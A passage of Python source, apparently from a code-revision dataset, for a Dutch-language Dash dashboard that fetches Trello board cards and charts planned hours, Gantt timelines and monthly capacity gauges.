Ending date')\n ].date():\n hoursperday = int(l[config.get('Custom Field with hours')]\n ) / int(30.4)\n beschikbareuren[k]['urenperdag'][i] = hoursperday\n except:\n pass\n for i, j in urenperdagperkaart.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n for i, j in beschikbareuren.items():\n for k, l in j['urenperdag'].items():\n for m in j['urenperperiode'].keys():\n if m == k[0:4] + k[5:7]:\n j['urenperperiode'][m] += l\n dfurenpermaand = copy.deepcopy(urenperdagperkaart)\n for i, j in dfurenpermaand.items():\n try:\n j['Geplande uren'] = int(j['Geplande uren'])\n except:\n j['Geplande uren'] = 0\n for k, l in j['urenperperiode'].items():\n j[k] = round(l, 2)\n del j['urenperperiode']\n bars = []\n labelsnietingepland = []\n for j in kaarten.values():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n labelsnietingepland.append(j['Lijst'])\n labelsnietingepland = list(dict.fromkeys(labelsnietingepland))\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmp = []\n for label in labelsnietingepland:\n if j['Lijst'] == label:\n tmp.append(int(j['Geplande uren']))\n else:\n tmp.append(0)\n bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],\n type='bar', opacity='0.6'))\n epicbars = []\n tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in\n kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}\n tmpepicsforbarchart['Geen epic'] = 0\n for i, j in kaarten.items():\n if j[config.get('Custom Field for Starting date')] == None and j[config\n .get('Custom Field for Ending date')] == None and j[config.get(\n 'Custom Field with hours')] != None and j['Status'\n ] == 'Niet gestart':\n tmpepicsforbarchart[j['Epic']] += int(j[config.get(\n 'Custom Field with hours')])\n epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}\n epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[\n value for value in epicsforbarchart.values()], type='bar', text=[\n value for value in epicsforbarchart.values()], textposition=\n 'outside', opacity='0.6'))\n thismonth = datetime.strftime(datetime.now(), '%Y%m')\n nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')\n twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')\n arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,\n '%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,\n '%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,\n '%Y%m').strftime('%B'))]\n gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n thismonth]))\n gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n nextmonth]))\n gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart\n .values() for keys, value in card['urenperperiode'].items() if keys ==\n twomonths]))\n deltathismonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == thismonth]))\n deltanextmonth = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == nextmonth]))\n deltatwomonths = round(sum([value for card in beschikbareuren.values() for\n keys, value in card['urenperperiode'].items() if keys == twomonths]))\n if deltathismonth > gaugegeplandthismonth:\n gaugerangethismonth = deltathismonth + 20\n else:\n gaugerangethismonth = gaugegeplandthismonth + 20\n if deltanextmonth > gaugegeplandnextmonth:\n gaugerangenextmonth = deltanextmonth + 20\n else:\n gaugerangenextmonth = gaugegeplandnextmonth + 20\n if deltatwomonths > gaugegeplandtwomonths:\n gaugerangetwomonths = deltatwomonths + 20\n else:\n gaugerangetwomonths = gaugegeplandtwomonths + 20\n gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5, \n deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},\n {'range': [deltathismonth * 0.9, deltathismonth], 'color':\n '#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}\n gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5, \n deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},\n {'range': [deltanextmonth * 0.9, deltanextmonth], 'color':\n '#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}\n gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *\n 0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5, \n deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [\n deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},\n {'range': [deltatwomonths * 0.9, deltatwomonths], 'color':\n '#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}\n gaugefig = go.Figure()\n gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},\n value=gaugegeplandthismonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltathismonth}, gauge=\n gaugestepsthismonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},\n value=gaugegeplandnextmonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltanextmonth}, gauge=\n gaugestepsnextmonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},\n value=gaugegeplandtwomonths, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').\n strftime('%B')}, delta={'reference': deltatwomonths}, gauge=\n gaugestepstwomonths))\n gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,\n 'gaugefig': gaugefig}\n columntypes = {}\n for key, value in kaarten[next(iter(kaarten))].items():\n if 'datum' in key or key == 'Aangemaakt':\n columntypes[key] = 'datetime'\n elif type(value) == int:\n columntypes[key] = 'numeric'\n elif type(value in [str, bool]):\n columntypes[key] = 'text'\n columntypesurenpermaand = dict(columntypes)\n columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})\n data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':\n urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':\n graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,\n 'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=\n dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}\n\n\ndef make_layout():\n return html.Div(className='First Div', children=[html.Div(style={\n 'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',\n 'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',\n 'background':\n 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)'\n , 'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',\n 'margin-left': '1%', 'border-radius': '10px', 'text-align':\n 'center'}, className='Banner', children=[html.Div(style={'display':\n 'inline-block', 'width': '80%'}, children=[html.H1(\n 'Trello borden USD')]), html.Div(style={'display': 'inline-block',\n 'margin-right': '1px'}, children=[html.Img(src=app.get_asset_url(\n 'logonop.png'), style={'width': '150px', 'margin-right': '0px'})])]\n ), html.H5('Kies hieronder een bord', style={'text-align': 'center'\n }), dcc.Dropdown(id='dropdown_boards', options=[{'label': i['name'],\n 'value': i['id']} for i in boards], value=boards[0]['id']), html.\n Button('Data verversen', id='refreshdatabtn', n_clicks=0), html.Div\n (id='test')])\n\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\nexternal_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets,\n external_scripts=external_scripts, url_base_pathname='/dash/')\napp.layout = make_layout\napp.config['suppress_callback_exceptions'] = True\n\n\n@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'\n ), Input('refreshdatabtn', 'n_clicks')])\ndef create_maindiv(value, n_clicks):\n get_data(value)\n import os\n if os.name == 'nt':\n daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')\n else:\n daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')\n return html.Div(className='', children=[dcc.Markdown(\n '**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',\n children=[dcc.Tab(label='Gantt charts', style=globals['styles'][\n 'tabs'], children=[html.Div(className='tab2_div1', style=globals[\n 'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=\n globals['styles']['divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'\n )])]), html.Div(className='tab2_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownganttepics',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n 'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(\n style=globals['styles']['divgraphs'], children=[dcc.Graph(id=\n 'ganttepics')])]), html.Div(className='tab2_div3', style=globals[\n 'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.\n Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoon', options=[{'label': name, 'value': name} for\n name in data['arrays'][config.get('Custom Field for Person')]]),\n dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoonstatus', options=[{'label': name, 'value':\n name} for name in data['arrays']['statuses']], value=data['arrays']\n ['statuses'], multi=True), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab\n (label='Data export', style=globals['styles']['tabs'], children=[\n html.Div(className='tab3_div1', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n \"Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand.\"\n ), dcc.Markdown(\n \"In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'.\"\n )])]), html.Div(className='tab3_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(\n 'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),\n dash_table.DataTable(id='table_plattedump', columns=[{'name': i,\n 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': \n True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']\n ['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(\n 'records'), hidden_columns=[i for i in data['dfs']['columntypes']],\n export_format='xlsx', export_headers='display', export_columns=\n 'all', filter_action='native', sort_action='native', sort_mode=\n 'multi', style_table={'overflowX': 'scroll'}, style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),\n html.Div(className='tab3_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Uren per maand'), dcc.Markdown(\n 'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'\n ), dcc.Markdown(\n 'Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'\n ), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':\n i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),\n 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in\n data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][\n 'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data\n ['dfs']['columntypesurenpermaand']], export_format='xlsx',\n export_headers='display', export_columns='all', filter_action=\n 'native', sort_action='native', sort_mode='multi', style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=\n 'Langetermijnplanning', style=globals['styles']['tabs'], children=[\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.\n Markdown('De focus hierbij ligt vooral op de categorieen.')])]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownurenpermaand',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n config.get('Custom Field for Categories')] if name != None], multi=\n True, searchable=False, value=data['arrays'][config.get(\n 'Custom Field for Categories')]), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(\n className='tab1_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.\n Markdown(\n '*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'\n ), dcc.Markdown(\n '*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'\n ), dcc.Markdown(\n '*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland', figure={'data': data['graphdata'][\n 'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),\n html.Div(className='tab1_div4', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per epic)'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland_epics', figure={'data': data[\n 'graphdata']['nietingeplandepics'], 'layout': globals[\n 'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][\n 'tabs'], label='Tactische planning', children=[html.Div(className=\n 'maindivs', style=globals['styles']['maindivs'], children=[html.H3(\n 'Uitleg'), dcc.Markdown(\n 'In dit tabblad is een middellange termijnplanning te zien.')]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Totalen'), dcc.Markdown(\n 'Hieronder staan twee totaaloverzichten van de aankomende maanden.'\n ), dcc.Markdown(\n 'De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'\n ), dcc.Markdown(\n 'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className\n ='maindivs', style=globals['styles']['maindivs'], children=[html.H4\n ('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in\n data['arrays']['threemonths']], multi=False, searchable=False,\n value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[\n 'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])\n ])])])\n\n\n@app.callback(Output('gantttactisch', 'figure'), [Input(\n 'dropdowngantttactisch', 'value')])\ndef update_gantttactisch(v1):\n if v1 != None:\n if v1[4:] == '12':\n v1plus1 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus1 = str(int(v1) + 1)\n if v1[4:] == '01':\n v1min1 = str(int(v1[0:4]) - 1) + '12'\n else:\n v1min1 = str(int(v1) - 1)\n if v1[4:] == '11':\n v1plus2 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus2 = str(int(v1) + 2)\n import random\n import numpy as np\n from operator import itemgetter\n ganttdata = []\n monthkey = int(v1)\n for i, j in data['kaarten'].items():\n if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:\n try:\n if int(datetime.strftime(j['Begindatum'], '%Y%m')\n ) <= monthkey and int(datetime.strftime(j[\n 'Einddatum'], '%Y%m')) >= monthkey:\n if j['Begindatum'].date() < datetime.strptime(\n v1min1 + '01', '%Y%m%d').date():\n start = datetime.strptime(v1min1 + '01', '%Y%m%d'\n ).date()\n else:\n start = j['Begindatum'].date()\n if j['Einddatum'].date() >= datetime.strptime(\n v1plus2 + '01', '%Y%m%d').date():\n eind = datetime.strptime(v1plus2 + '01', '%Y%m%d'\n ).date()\n else:\n eind = j['Einddatum'].date()\n ganttdata.append(dict(Task=j['Epic'], Start=start,\n Finish=eind, Resource=j['Naam'] + ' (uren: ' +\n str(round(data['urenperdagperkaart'][j['Naam']]\n ['urenperperiode'][v1])) + ')'))\n except:\n pass\n result = sorted(ganttdata, key=itemgetter('Task'))\n rgb = []\n for c in range(len(result)):\n r = list(np.random.choice(range(256), size=3))\n s2 = ','.join(map(str, r))\n s1 = 'rgb('\n s3 = ')'\n rgb.append(s1 + s2 + s3)\n fig = ff.create_gantt(result, index_col='Resource', show_colorbar=\n True, group_tasks=False, showgrid_x=True, showgrid_y=True,\n colors=rgb)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4] + '-' + v1[4:] +\n '-01', v1[0:4] + '-' + v1[4:] + '-01'], y=[-1, len(result)],\n line={'shape': 'spline', 'color': 'black', 'width': 4},\n showlegend=False))\n fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4] + '-' +\n v1plus1[4:] + '-01', v1plus1[0:4] + '-' + v1plus1[4:] + '-01'],\n y=[-1, len(result)], line={'shape': 'spline', 'color': 'black',\n 'width': 4}, showlegend=False))\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttpersoon', 'figure'), [Input(\n 'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',\n 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'\n ] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',\n 'value')])\ndef update_ganttepics(value):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j['Epic'] == value and j['Status'] != 'Archived':\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Status']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('urenpermaand', 'figure'), [Input(\n 'dropdownurenpermaand', 'value')])\ndef update_urenpermaand(value):\n layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 'gray'},\n yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})\n bars = []\n if 'Regulier werk' in value:\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['urenperdagperkaart'].values() if value[config.get(\n 'Custom Field for Categories')] == 'Regulier werk']), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis, name=\n 'Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers', marker={'symbol': 'triangle-up-open',\n 'size': 10}, stackgroup='one'))\n for categorie in data['arrays'][config.get('Custom Field for Categories')]:\n if categorie in value and categorie != 'Regulier werk':\n if categorie == None:\n categorienaam = 'Geen categorie'\n else:\n categorienaam = categorie\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for\n value in data['urenperdagperkaart'].values() if value[\n config.get('Custom Field for Categories')] == categorie\n ]), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis,\n name=categorienaam, line={'shape': 'spline', 'smoothing': \n 0.4}, mode='lines+markers', marker={'symbol':\n 'triangle-up-open', 'size': 10}, stackgroup='one'))\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['beschikbareuren'].values()]), 0))\n bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[\n 'arrays']['xaxis_months'], y=yaxis, size=10, line={'shape':\n 'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))\n return {'data': bars, 'layout': layout}\n\n\n@app.server.route('/dash/configuration/')\ndef download_file():\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename='configuration.txt', as_attachment=True,\n cache_timeout=0)\n\n\nif __name__ == '__main__':\n app.run_server(debug=False, host='0.0.0.0', port=8050)\n",
"step-4": "import os, json, locale, requests, dash, dash_table, copy, time, flask, base64\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objects as go\nimport pandas as pd\nfrom os import listdir\nimport plotly.figure_factory as ff\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\nfrom dash.dependencies import Input, Output\nfrom datetime import date, datetime, timedelta, time\nfrom dateutil.relativedelta import relativedelta\ntry:\n with open('./configuration/credentials.txt') as json_file:\n credentials = json.load(json_file)\n with open('./configuration/configuration.txt') as json_file:\n config = json.load(json_file)\nexcept:\n raise Exception('Draai eerst deploy.py!')\nlocale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')\nglobals = {'config': config, 'credentials': credentials, 'styles': {}}\nboard_url = ('https://api.trello.com/1/members/me/boards?fields=name&key=' +\n credentials.get('API key') + '&token=' + credentials.get('API token'))\nboards = json.loads(json.dumps(requests.get(board_url).json()))\nglobals['boards'] = boards\nglobals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',\n 'background-image': \"url('./assets/left.png')\", 'background-repeat':\n 'no-repeat', 'background-position': '0px 0px', 'margin-top': '1%',\n 'margin-bottom': '1%', 'margin-left': '1%', 'margin-right': '1%',\n 'text-align': 'center', 'border-radius': '10px'}\nglobals['styles']['tabs'] = {'border-style': 'solid', 'border-width': '2px',\n 'background': 'rgb(255,255,255)', 'background':\n 'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)'\n , 'margin-top': '5px', 'margin-bottom': '5px', 'margin-right': '5px',\n 'margin-left': '5px', 'border-radius': '6px'}\nglobals['styles']['divgraphs'] = {'background-color':\n 'rgba(62,182,235,0.1)', 'margin-top': '1%', 'margin-bottom': '2%',\n 'margin-left': '1%', 'margin-right': '1%', 'text-align': 'center',\n 'border-radius': '10px'}\nglobals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}\nglobals['graphlayouts'] = {'bars': go.Layout(barmode='stack', paper_bgcolor\n ='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}\n\n\ndef get_data(value):\n global data\n global config\n with open('./configuration/configuration.txt') as json_file:\n configfile = json.load(json_file)\n config = configfile.get(value)\n keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(\n 'API token')\n trello_base_url = 'https://api.trello.com/1/'\n board_url = trello_base_url + 'boards/' + value\n url_cards = (board_url +\n '?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'\n + keys)\n url_lists = board_url + '/lists?filter=all&' + keys\n url_customfields = board_url + '/customFields?' + keys\n url_labels = board_url + '/labels?' + keys\n url_members = board_url + '/members?' + keys\n board = json.loads(json.dumps(requests.get(url_cards).json()))\n lists = json.loads(json.dumps(requests.get(url_lists).json()))\n customfields = json.loads(json.dumps(requests.get(url_customfields).json())\n )\n labels = json.loads(json.dumps(requests.get(url_labels).json()))\n members = json.loads(json.dumps(requests.get(url_members).json()))\n cards = board['cards']\n\n def dateCalc(date):\n try:\n newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')\n return newdate\n except:\n return None\n customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},\n 'checkbox': {}}\n for i in customfields:\n customfields_dict[i['type']] = {}\n for i in customfields:\n customfields_dict[i['type']][i['id']] = {}\n for i in customfields:\n if i['type'] == 'list':\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n customfields_dict['list'][i['id']]['options'] = {}\n for j in i['options']:\n customfields_dict['list'][i['id']]['options'][j['id']] = j[\n 'value'].get('text')\n else:\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n chosenlists = []\n for i in config.get('Not Started'):\n chosenlists.append(i)\n chosenlists.extend(config.get('Blocked'))\n chosenlists.extend(config.get('Doing'))\n chosenlists.extend(config.get('Done'))\n for i in config.get('Epics'):\n chosenlists.append(i)\n for i in config.get('Always continuing'):\n chosenlists.append(i)\n for i in config.get('List with Epics Done'):\n chosenlists.append(i)\n\n def idtodate(cardid):\n hex = cardid[0:8]\n timestamp = int(hex, 16)\n timedate = datetime.fromtimestamp(timestamp)\n return timedate\n\n def get_epicid(url):\n try:\n if 'epicId=' in url:\n start = url.find('epicId=') + 7\n end = url.find('&attachmentId=')\n return url[start:end]\n else:\n pass\n except:\n pass\n kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i\n ['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':\n idtodate(i['id']), 'labels': [label['name'] for label in i['labels'\n ] if i['labels'] != []], 'members': [member['fullName'] for member in\n members if member['id'] in i['idMembers']], 'Sjabloon': i[\n 'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i\n ['closed'], 'epicid': [get_epicid(j['url']) for j in i[\n 'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in\n cards}\n for i, j in kaarten.items():\n while None in j['epicid']:\n j['epicid'].remove(None)\n if j['members'] != []:\n j['Leden'] = ''\n for k in j['members']:\n if j['Leden'] == '':\n j['Leden'] += k\n else:\n j['Leden'] += ', ' + k\n else:\n j['Leden'] = None\n del j['members']\n if customfields_dict != {}:\n for i, j in customfields_dict.items():\n for k, l in j.items():\n for m, n in kaarten.items():\n n[l['name']] = None\n for i, j in kaarten.items():\n for k in j['customfields']:\n if k['idCustomField'] in customfields_dict['list'].keys():\n j[customfields_dict['list'][k['idCustomField']].get('name')\n ] = customfields_dict['list'][k['idCustomField']][\n 'options'].get(k['idValue'])\n elif k['idCustomField'] in customfields_dict['checkbox'].keys(\n ):\n if k['value']['checked'] == 'true':\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = True\n else:\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = False\n elif k['idCustomField'] in customfields_dict['date'].keys():\n j[customfields_dict['date'][k['idCustomField']].get('name')\n ] = dateCalc(k['value'].get('date'))\n else:\n for key in k['value']:\n j[customfields_dict[key][k['idCustomField']].get(\n 'name')] = k['value'].get(key)\n epicIdNameCategory = []\n for i, j in kaarten.items():\n 